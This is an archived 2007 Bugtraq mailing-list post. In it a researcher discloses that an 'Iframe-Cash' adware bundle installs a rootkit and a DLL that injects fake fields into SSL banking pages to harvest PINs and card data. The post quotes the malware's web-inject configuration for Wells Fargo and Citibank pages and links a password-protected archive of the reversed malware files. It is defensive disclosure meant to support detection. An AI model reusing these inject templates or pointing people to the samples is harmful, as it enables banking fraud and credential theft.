Iframe-Cash/Iframe-Dollars Adware bundle...oooh... my ....god..

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Iframe-Cash/Iframe-Dollars Adware bundle...oooh... my ....god..
From: Thierry Zoller <Thierry@xxxxxxxxx>
Date: Sun, 11 Mar 2007 18:30:18 +0100
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Organization: Kachkeis Liebhaber CoKG
Resent-cc: recipient list not shown: ;
Resent-date: 11 Mar 2007 18:29:52 -0000
Resent-from: Thierry Zoller <Thierry@xxxxxxxxx>
Resent-message-id: <20070311182952.1760.qmail@xxxxxxxxxxxxxxxxxxxxxx>

Dear list,

Whoever deals with these poeple and thinks they are a benign Adware
company (and thus spreads their bundles.

Check this :
Ignoring the fact that they basicaly  install a Rootkit, I attached a
few files I reversed, they install a DLL that does not directly KEYLOG your
banking data, but INJECTS HTML CODE into the _genuine_ (SSLed) Banking page
asking you to enter more details (like PIN, Magic Password etc), then
capture that data and transmit it (I did no further investigation)

http://secdev.zoller.lu/system32.zip
Pass: 123

I am disgusted. They even created their own XML parser for this ...

An extract of HTML code they inject :
-------------------------------------
<inject
url="wellsfargo" 
before="name=userid autocomplete='off'></DIV>" 
what="
<DIV><LABEL for=userid>ATM PIN</LABEL>:<BR><SPAN class='mozcloak'><INPUT id=pin 
 tabIndex=2 maxLength=4 type=password size=4 name=pin 
autocomplete='off'></SPAN></DIV>
"
block="alt=Go" 
check="pin"
quan="4"
content="d"
>
</inject>
------------------------------------

Attached the main files (pass 123), feel free to add this as HIPS or whatever
signatures, those interested in a complete reversal can contact me
to receive the EXE in question.

I have no more time feel free to dig deeper.


I especialy liked this :
------------------------
<inject
url="citibank.com" 
<TR><TD colspan=3 class=smallArial noWrap><SPAN STYLE='color:red'>To prevent 
fraud enter your credit card information please:</SPAN></TD></TR>


Puke..

-- 
http://secdev.zoller.lu
Thierry Zoller

Follow-Ups:
- Re: Iframe-Cash/Iframe-Dollars Adware bundle...oooh... my ....god..
  - From: Reversemode
- Re: Iframe-Cash/Iframe-Dollars Adware bundle...oooh... my ....god..
  - From: Gadi Evron

Prev by Date: [ECHO_ADV_69$2007] OES (Open Educational System) 0.1beta Remote File Inclusion Vulnerability
Next by Date: Call for Papers: DeepSec IDSC 2007 Europe/Vienna: 20-23 Nov 2007
Previous by thread: [ECHO_ADV_69$2007] OES (Open Educational System) 0.1beta Remote File Inclusion Vulnerability
Next by thread: Re: Iframe-Cash/Iframe-Dollars Adware bundle...oooh... my ....god..
Index(es):
- Date
- Thread